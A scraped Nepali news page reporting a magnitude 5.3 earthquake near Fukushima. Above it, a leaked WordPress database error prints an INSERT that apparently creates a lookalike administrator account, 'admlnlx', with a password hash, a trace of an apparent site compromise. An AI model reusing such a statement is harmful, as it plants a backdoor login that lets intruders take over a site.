WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B781J0exbIqNKxXTKiQDFTxzlS/uqI0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-28 06:16:16', '', 'admlnlx', 'admlnlx')

जापानको फुकुशिमामा भूकम्प – Gaule Khabar

जापानको फुकुशिमामा भूकम्प

जापानको फुकुशिमामा भूकम्प

जापानको फुकुशिमा प्रिफेक्चर नजिक बुधबार ५।३ म्याग्नीच्यूडको भूकम्प गएको जापानको मौसम विज्ञान विभागले जनाएको छ ।

विभागका अनुसार उक्त भूकम्प स्थानीय समय अनुसार साँझ ५।२९ बजे गएको थियो । भूकम्पको केन्द्र जमिनको सतहबाट करिब ६० किलोमिटरको गहिराईमा रहेको थियो ।

भूकम्पका कारण जापानको सामुद्रिक इलाकामा कुनै सुनामी आइहाल्ने अवस्था नदेखिएको पनि विभागले जनाएको छ । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका